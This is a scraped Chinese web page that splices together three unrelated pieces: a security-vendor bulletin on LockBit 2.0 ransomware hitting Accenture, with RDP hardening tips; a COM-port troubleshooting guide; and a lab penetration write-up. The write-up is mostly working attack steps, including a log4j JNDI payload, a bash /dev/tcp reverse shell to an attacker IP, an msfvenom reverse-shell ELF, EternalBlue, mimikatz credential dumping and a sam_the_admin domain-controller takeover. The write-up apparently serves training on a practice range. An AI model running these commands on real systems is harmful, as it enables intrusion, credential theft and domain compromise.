端口扫描是什么_2021端口扫描

hacker|
141

LockBit2.0勒索软件攻击埃森哲 国内企业应加强防范

近日,全球IT咨询巨头埃森哲遭到LockBit勒索团伙的网络攻击,公司6TB的内部数据被窃取,2500台计算机遭遇宕机,所中病毒为LockBit的2.0版本。由于LockBit2.0勒索软件近段时间异常活跃,且危害性较大,因此瑞星公司发布安全提醒,建议广大用户加强警惕,谨防LockBit2.0勒索软件大规模爆发。

事件回顾:

8月11日,全球IT咨询巨头埃森哲遭受了来自LockBit勒索软件团伙的攻击,其2500台属于员工和合作伙伴的计算机已中招,此次埃森哲遭遇的网络攻击,是LockBit勒索软件的2.0版本。LockBit团伙表示,如果埃森哲不尽快支付5000万美元(约合3.2亿人民币)赎金,将会把所窃取的6TB数据公之于众。

图:LockBit勒索软件运营商网站显示数据泄露倒计时

据悉,埃森哲是全球最大的上市咨询公司和《财富》世界500强公司之一,提供战略、咨询、数字、技术和运营服务及解决方案。为超过120个国家200个城市的客户提供服务,其客户包括超过四分之三的世界500强企业、各国政府机构以及军队。埃森哲涉足 汽车 、银行、政府、技术、能源和电信等领域,市值2032亿美元,旗下拥有超过50万员工。

勒索软件及其组织背景:

Lockbit勒索软件早在2019年9月就被发现,当时称之为“ABCD病毒”,利用此勒索软件进行攻击的黑客团伙以针对企业及政府组织而出名,主要目标为中国,印度,印度尼西亚,乌克兰、英国,法国,德国等国家。今年6月,LockBit勒索团伙将原有勒索软件升级为LockBit 2.0版本,并对外宣称这是全世界加密最快的勒索软件,可以在不到 20 分钟的时间内从受感染的系统下载 100 GB 的数据。

图:勒索软件加密速度对比表

瑞星安全研究院介绍,由于该勒索软件通过RDP弱口令爆破攻击,不仅加密本地磁盘文件,还将枚举并加密同一网段下的所有共享磁盘,同时加密方式采用了RSA结合AES,因此至今在没有秘钥的情况下是无法被破解的。

LockBit勒索团伙采用了勒索软件即服务 (RaaS) 的形式,为其客户(实际发动攻击的人)提供基础设施和恶意程序,然后收取一部分赎金分红。LockBit自推出以来,一直非常活跃,帮派代表推广RaaS并在各种俄语黑客论坛上提供支持。当勒索软件主题在网络犯罪论坛上被禁止后,LockBit于2021年6月在其数据泄漏站点上宣布了LockBit 2.0 RaaS。

图:LockBit2.0 RaaS的宣传信息

预防措施:

瑞星公司发现,国内已有部分企业感染了LockBit2.0勒索软件,同时从瑞星“云安全”系统数据可以看出,仅7月份所截获勒索软件样本就有1.12万个,感染次数为5.7万次,因此考虑到LockBit 2.0感染性和危害性巨大,瑞星为广大用户提供以下防御措施:

针对RDP弱口令攻击的防范建议:

1. 限制可使用RDP的用户,仅将远程访问授权给那些必须用它来执行工作的人。

2. 建立双重验证,如Windows平台下的Duo Security MFA或Linux平台下google-authenticator等认证程序。

3. 设置访问锁定策略,通过配置账户锁定策略,调整账户锁定阀值与锁定持续时间等配置,可以有效抵御一定时间下高频的暴力破击。

4. 审视RDP的使用需求,如果业务不需要使用它,那么可以将所有RDP端口关闭,也可以仅在特定时间之间打开端口。

5. 重新分配RDP端口,可考虑将默认RDP端口更改为非标准的端口号, 可避免一部分恶意软件对特定RDP端口的直接攻击,仍需另外部署端口扫描攻击防范措施。

6. 定期检查、修补已知的RDP相关漏洞。

7. 创建防火墙规则限制远程桌面的访问, 以仅允许特定的IP地址。

8. RDP的登陆,应使用高强度的复杂密码以降低弱口令爆破的机会。

针对系统安全性的防范建议:

1. 及时更新软件及系统补丁。

2. 定期备份重要数据。

3. 开启并保持杀毒软件及勒索防护软件功能的正常。

4. 定期修改管理员密码并使用复杂度较高的密码。

5. 开启显示文件扩展名,防范病毒程序伪装应用程序图标。

针对局域网安全性的防范建议:

1. 非必要时可关闭局域网共享文件或磁盘,防止病毒横向传播。

2. 对局域网共享文件夹设置指定用户的访问权限,防止不必要的权限遭到病毒滥用。

3. 通过防火墙规则限制如445、3389端口/关闭445、3389端口或是修改端口号,防止病毒通过扫描端口等方式查询区域资产信息。

com1和com2端口链接异常

右键点击【计算机】,选择【属性】-【设备管理器】:

2.打开设备管理器之后,展开【端口】信息,检查通信端口com1是否已启用,如果未被启用,可以选中端口点击右键,选择【启用】即可。

3.双击端口,查看设备状态:

方案二:检查com1端口是否被其它程序占用

1.打开设备管理器后,如果端口已经启用并且com1运转正常,则有可能是因为被其他程序占用而产生访问被拒绝的报错。

2.选中端口点击右键,选择【禁用】,使其停止运行:

3.完成设置后重启计算机,如果有程序使用"com1"端口,该程序这时将会出现错误。这样就能知道是那个程序在使用该端口了。停止运行或者卸载该程序,并且重启启用端口即可解除占用。

方案三:更新端口驱动

1.打开设备管理器,右键点击端口,选择【更新驱动程序软件】

2.在计算机中手动查找并安装驱动程序软件:

解决方案四:

1.在【360安全卫士】—【软件管家】—【软件宝库】的【全部软件】里下载【驱动大师】安装。(如图1)

图1

2.运行【驱动大师】,找到【主板】点击【更新】。(如图2)

图2

3.安装完毕之后重新启动电脑即可。

访问其他计算机被拒绝

家里宽带怎么办理

精选推荐

广告

对端口Com1的访问被拒绝

8095阅读·0评论·1点赞

2016年6月18日

彻底解决COM端口被占用(在使用中)问题的办法

38下载·0评论

2020年8月1日

windows COM端口被占用(在使用中)解决办法

652阅读·0评论·1点赞

2022年10月24日

对端口com2的访问被拒绝_端口扫描防御手段

683阅读·0评论·0点赞

2020年12月3日

C#串口判定USB是否拔出问题检测/弹出“对窗口的访问被拒绝”

828阅读·0评论·0点赞

2022年3月30日

C# 串口编程 对端口的访问被拒绝

3089阅读·0评论·0点赞

2019年9月26日

颜料颜色的比较

精选推荐

广告

计算机端口com1,访问端口“COM1”被拒绝(Access to the port “COM1” is denied)

5057阅读·0评论·0点赞

2021年7月31日

端口访问被拒绝的解决方案

1.0W阅读·0评论·0点赞

2020年7月25日

如何关闭端口号

107阅读·0评论·0点赞

2019年10月5日

winform访问被拒绝_c# – 为什么访问com端口被拒绝?

799阅读·0评论·0点赞

2020年12月31日

记录Win10因为管理员权限而出现的访问COM口被占用的问题

766阅读·0评论·0点赞

2021年4月28日

centos7端口无法访问端口拒绝访问解决办法

2.7W阅读·0评论·3点赞

2019年2月18日

对端口“COM2”的访问被拒绝。

2.9W阅读·2评论·2点赞

2011年8月31日

对端口com2的访问被拒绝_思科访问控制列表(ACL)设置,控制网络访问

1061阅读·0评论·0点赞

2020年11月24日

对"com1"的访问被拒绝

3010阅读·0评论·0点赞

2006年12月1日

去首页

看看更多热门内容

记一次log4j2引发的渗透测试

记一次log4j2打入内网并用CVE-2021-42287、CVE-2021-42278获取到DC权限的靶场渗透。

首先对web进行端口扫描,发现38080端口和22端口

访问一下38080端口发现是一个error page

用Wappalyzer看一下是什么架构,但是好像没有检测出来

拿着报错去百度上发现应该是springboot

索性用goby再去扫一下,应该是spring没错,但是没有漏洞是什么操作?联想到最近出的log4j2的洞,可能他只是一个日志文件所以并没有框架

使用 payload=${jndi:ldap://p9j8l8.dnslog.cn} 验证一下有回显证明存在漏洞

尝试进一步利用漏洞,首先起一个ldap服务,ip为本地接收shell的ip地址

pre class="a113-6cf0-7341-5265 md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"java -jar JNDIExploit-1.3-SNAPSHOT.jar -i 192.168.1.105/pre

抓包修改 Content-Type: appllication/x-www-form-urlencoded ,并执行以下payload成功回显

pre class="6cf0-7341-5265-568e md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"payload=${jndi: ldap://192.168.1.105:1389/TomcatBypass/TomcatEcho }/pre

执行 ls -al / 看一下也成功

nc开启监听端口

然后使用bash命令反弹,这里需要先base64编码然后对编码后的特殊字符进行2层url转码

pre class="7341-5265-568e-0463 md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"bash -i /dev/tcp/192.168.1.105/9999 01/pre

抓包添加 payload=${jndi:ldap:1/192.168.1.105:1389/TomcatBypass/Command/Base64/二层转码之后的字符} ,即可得到反弹shell

进行信息搜集发现为docker环境,这里尝试了docker逃逸失败,那么继续进行信息搜集

在根目录下找到了第一个flag,这里有一个 got this ,在之前端口扫描的时候看到开放了22端口,尝试使用ssh直接连接

使用xshell尝试连接

连接成功,拿到了宿主机的权限

ifconfig查看网卡情况发现还有一张10.0.1.0/24段的网卡

这里方便的话其实可以使用cs上线linux后用cs继续打,这里我就没有上线cs,使用linux的命令对10.0.1.0/24段探测存货主机

pre class="5265-568e-0463-be8c md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;" for i in 10.0.1.{1..254}; do if ping -c 3 -w 3 i Find the target; fi; done/pre

ping一下是存活的

使用毒液把流量代理出来,首先开启监听

pre class="638a-4cf3-5a82-9ec3 md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"admin.exe -lport 7777/pre

然后上传agent_linux到靶机上

加权并执行

pre class="4cf3-5a82-9ec3-57a4 md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"chmod 777 agent_linux_x86

agent_linux_x86 -rhost 192.168.1.105 -rport 7777/pre

连接成功

这里本来准备用毒液的代理到msf打的,后面觉得比较麻烦,就直接用kali生成的elf马上线msf了

首先生成一个32位的elf马

pre class="5a82-9ec3-57a4-b1ce md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f elf shell.elf/pre

然后加权并执行

pre class="9ec3-57a4-b1ce-d9f8 md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"chmod 777 shell.elf

./shell/pre

kali使用 exploit/multi/handler 进行监听

获取到宿主机的shell

然后添加10.0.1.0/24段的路由

pre class="57a4-b1ce-d9f8-03b5 md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"bg

route add 10.0.1.0 255.255.255.0 1

route print/pre

然后配置 proxychain4.conf 文件并使用socks模块

pre class="b1ce-d9f8-03b5-0c1b md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"search socks

use auxiliary/sevrer/socks_proxy

run/pre

我们在之前已经知道了内网主机的ip,那么这里我们直接使用proxychain配合nmap对10.0.1.7的端口进行扫描

pre class="d9f8-03b5-0c1b-9ab3 md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"proxychains4 nmap -sT -Pn 10.0.1.7/pre

发现有445端口,那么对445端口进一步扫描

先确定一下系统版本,使用 auxiliary/scanner/smb/smb_version 模块,发现是win7 sp1

看能不能利用永恒之蓝,这里使用到 auxiliary/scanner/smb/smb_ms17_010 模块,发现可以利用永恒之蓝

使用 exploit/windows/smb/ms17_010_eternalbule 模块,因为是不出网环境,这里需要用到 bind_tcp 载荷

run之后拿到一个system权限的meterpreter

在 C:\Users\root\Desktop 下拿到第二个flag

然后继续进行信息搜集,发现同样是双网卡,还存在10.0.0.0/24段的一张网卡

ipconfig /all看到dns服务器为 redteam.lab 应该在域内

这里ping一下 redteam.lab 得到域控的ip为10.0.0.12

这里不知道域控有什么洞,先上传一个mimikatz把密码抓取出来,得到 Administrator/Admin12345 ,这里其实就可以使用域管账户ipc直接连接,但是这里抓到了一个域用户,尝试使用最新的CVE-2021-42287、CVE-2021-42278来进行攻击,关于漏洞的原理请 移步

pre class="03b5-0c1b-9ab3-df7b md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"privilege::debug

sekurlsa::logonpasswords/pre

这里我准备使用noPac.exe直接去获取一个shell的,但是这里noPac.exe的利用条件是需要主机上有.net4.0环境,所以这里没有回显

本来准备一步一步的用原始的方法打的,但是powershell用不了没有回显,就写一下原始利用的步骤吧

这里直接使用 sam_the_admin.py 进行攻击

pre class="0c1b-9ab3-df7b-a113 md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"proxychains python3 sam_the_admin.py "redteam/root:Red12345" -dc-ip 10.0.0.12 -shell/pre

即可拿到DC的shell

在 C:\Users\Administrator\Desktop 下找到最后一个flag

0条大神的评论

发表评论